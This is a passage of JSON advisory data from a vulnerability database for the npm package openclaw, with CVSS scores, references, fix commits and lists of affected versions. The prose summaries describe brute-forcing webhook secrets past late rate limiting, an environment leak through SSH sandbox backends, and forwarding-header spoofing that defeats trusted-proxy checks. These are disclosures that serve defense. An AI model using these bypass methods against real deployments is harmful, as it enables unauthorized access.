3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.8"}],"aliases":["GHSA-6q2v-vfwp-pvwh"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sh4x-nq7t-ykgg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90884?format=json","vulnerability_id":"VCID-sj4d-eenz-zqet","summary":"Duplicate Advisory: OpenClaw: Zalo webhook rate limiting could be bypassed before secret validation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-5m9r-p9g7-679c. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.12 applies rate limiting only after successful webhook authentication, allowing attackers to bypass rate limits and brute-force webhook secrets. Attackers can submit repeated authentication requests with invalid secrets without triggering rate limit responses, enabling systematic secret guessing and subsequent forged webhook submission.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34505","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34505"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-rate-limiting-bypass-via-pre-authentication-secret-validation","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-rate-limiting-bypass-via-pre-authentication-secret-validation"},{"reference_url":"https://github.com/advisories/GHSA-cxfr-3qp8-hpmw","reference_id":"GHSA-cxfr-3qp8-hpmw","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cxfr-3qp8-hpmw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-cxfr-3qp8-hpmw"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sj4d-eenz-zqet"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89991?format=json","vulnerability_id":"VCID-sja9-6t41-hud8","summary":"OpenClaw: SSH-based sandbox backends pass unsanitized process.env to child processes\n## Summary\nSSH-based sandbox backends pass unsanitized process.env to child processes\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Shipped SSH sandbox paths leaked unsanitized env into local SSH child processes, but remote leakage needs non-default SSH env forwarding, so lower to low.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `cfe14459531e002a1c61c27d97ec7dc8aecddc1f` — 2026-03-30T20:05:57+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/cfe14459531e002a1c61c27d97ec7dc8aecddc1f","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/cfe14459531e002a1c61c27d97ec7dc8aecddc1f"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j9pv-rrcj-6pfx","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j9pv-rrcj-6pfx"},{"reference_url":"https://github.com/advisories/GHSA-j9pv-rrcj-6pfx","reference_id":"GHSA-j9pv-rrcj-6pfx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j9pv-rrcj-6pfx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-j9pv-rrcj-6pfx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sja9-6t41-hud8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91179?format=json","vulnerability_id":"VCID-sw3m-5ryw-jbdh","summary":"OpenClaw: Forwarding header spoofing bypasses gateway.trustedProxies origin detection\n## Summary\nWhen gateway.trustedProxies was configured, spoofed loopback hops in forwarding headers could be accepted as the client origin and weaken downstream auth and rate-limit decisions.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `fc2d29ea926f47c428c556e92ec981441228d2a4`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/gateway/net.ts now ignores loopback forwarded hops before trusted-proxy client resolution.\n- That shipped origin fix is the one consumed by canvas auth and gateway auth-rate-limit paths that rely on resolved client identity.\n\nOpenClaw thanks @lintsinghua for 